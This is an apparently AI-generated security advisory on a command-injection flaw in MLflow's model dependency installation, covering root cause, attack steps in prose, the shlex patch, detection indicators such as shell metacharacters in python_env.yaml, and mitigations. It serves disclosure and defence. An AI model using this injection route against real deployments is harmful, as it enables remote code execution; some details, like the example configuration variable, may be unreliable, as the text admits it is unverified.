CVE-2025-15379 Overview
A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the _install_model_dependencies_to_env() function. When deploying a model with env_manager=LOCAL, MLflow reads dependency specifications from the model artifact's python_env.yaml file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model.
Critical Impact
This vulnerability enables attackers to achieve arbitrary command execution on systems deploying malicious model artifacts, potentially compromising the entire ML infrastructure and any connected systems.
Affected Products
- MLflow version 3.8.0
- MLflow deployments using env_manager=LOCAL configuration
- Systems loading model artifacts from untrusted sources
Discovery Timeline
- 2026-03-30 - CVE CVE-2025-15379 published to NVD
- 2026-03-30 - Last updated in NVD database
Technical Details for CVE-2025-15379
Vulnerability Analysis
This command injection vulnerability (CWE-77) resides in MLflow's container initialization code within the _install_model_dependencies_to_env() function. The vulnerability arises from unsafe handling of user-controlled input during the model deployment process. When MLflow deploys a model with env_manager=LOCAL, it reads dependency specifications from the model artifact's python_env.yaml file. These specifications are then directly interpolated into a shell command without proper sanitization or escaping.
An attacker can craft a malicious model artifact containing specially crafted dependency strings in the python_env.yaml file. When an unsuspecting system attempts to deploy this model, the malicious payload is executed with the privileges of the MLflow process, potentially leading to complete system compromise.
Root Cause
The root cause is improper input validation and lack of sanitization when constructing shell commands from user-supplied data. The _install_model_dependencies_to_env() function directly uses dependency names and versions from python_env.yaml in shell command construction without escaping special characters or validating input format. This is a classic command injection pattern where untrusted data flows directly into shell execution contexts.
Attack Vector
The attack is network-accessible and requires no authentication or user interaction. An attacker can:
- Create a malicious MLflow model artifact with a crafted python_env.yaml file
- Host or distribute the malicious model through model registries, shared storage, or supply chain compromise
- Wait for a target system to deploy the model using env_manager=LOCAL
- The injected commands execute automatically during the dependency installation phase
The security patch demonstrates the fix by importing the shlex module to properly escape shell arguments:
import logging
import multiprocessing
import os
+import shlex
import shutil
import signal
import sys
Source: GitHub Commit
Detection Methods for CVE-2025-15379
Indicators of Compromise
- Unusual process spawning from MLflow model serving containers
- Unexpected network connections originating from ML inference endpoints
- Suspicious entries in python_env.yaml files containing shell metacharacters such as ;, |, $(), or backticks
- Anomalous system commands executed during model deployment phases
Detection Strategies
- Monitor model artifact integrity by implementing checksum verification for python_env.yaml files
- Deploy file integrity monitoring on MLflow model directories to detect unauthorized modifications
- Implement runtime application self-protection (RASP) to detect command injection patterns during model loading
- Review model artifacts for suspicious dependency strings before deployment
Monitoring Recommendations
- Enable comprehensive logging for MLflow model deployment operations
- Monitor process execution trees for child processes spawned during model initialization
- Implement network segmentation alerts for ML serving containers making unexpected outbound connections
- Configure SentinelOne to monitor for suspicious command-line patterns in Python processes
How to Mitigate CVE-2025-15379
Immediate Actions Required
- Upgrade MLflow to version 3.8.2 or later immediately
- Audit all existing model artifacts for suspicious python_env.yaml contents
- Restrict model loading to trusted, verified sources only
- Implement strict network segmentation for ML serving infrastructure
Patch Information
MLflow has addressed this vulnerability in version 3.8.2. The fix introduces proper shell argument escaping using the shlex module to sanitize dependency specifications before shell command construction. Organizations should upgrade immediately to the patched version.
For more details, see the GitHub security commit and the Huntr vulnerability disclosure.
Workarounds
- Avoid using env_manager=LOCAL configuration until patching is complete
- Implement strict model artifact validation pipelines that reject artifacts containing shell metacharacters in python_env.yaml
- Deploy models only from trusted, cryptographically signed sources
- Use containerized deployment with minimal privileges and network isolation
# Configuration example: Restrict MLflow model loading to verified sources
# Set environment variables to enforce model verification
export MLFLOW_TRACKING_URI="https://secure-mlflow-server.internal"
export MLFLOW_MODEL_VALIDATION=strict
# Use virtual environment manager instead of LOCAL to avoid the vulnerable code path
mlflow models serve -m models:/MyModel/Production --env-manager=virtualenv
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


